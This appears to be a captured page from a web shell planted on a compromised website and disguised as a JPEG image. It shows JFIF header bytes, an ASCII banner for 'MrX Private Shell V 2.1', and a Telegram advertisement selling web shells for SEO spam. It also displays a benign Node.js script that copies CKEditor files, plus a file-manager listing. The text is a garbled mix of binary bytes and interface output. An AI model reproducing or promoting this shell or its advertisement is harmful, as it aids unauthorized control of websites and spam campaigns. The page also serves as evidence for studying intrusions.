����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
const fs = require('fs');
const files = [
'adapters',
'lang',
'plugins/about',
'plugins/clipboard',
'plugins/dialog',
'plugins/link',
'plugins/table',
'plugins/tableselection',
'plugins/scayt',
'plugins/icons_hidpi.png',
'plugins/icons.png',
'skins/moono-lisa',
'vendor',
'ckeditor.js',
'contents.css',
'styles.js',
'CHANGES.md',
'LICENSE.md',
'README.md',
'SECURITY.md'
];
const ckeditorDir = './node_modules/ckeditor4';
const destination = './ckeditor';
// Cleanup directory
fs.rmSync(destination, { recursive: true, force: true });
// Copy the files from the npm
files.forEach(file => {
fs.cp(`${ckeditorDir}/${file}`, `${destination}/${file}`, {recursive: true}, err => {
if (err) throw err;
});
});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ef21241c374614910950d7dcf2086745e732ce47 | File | 760 B | 0666 |
|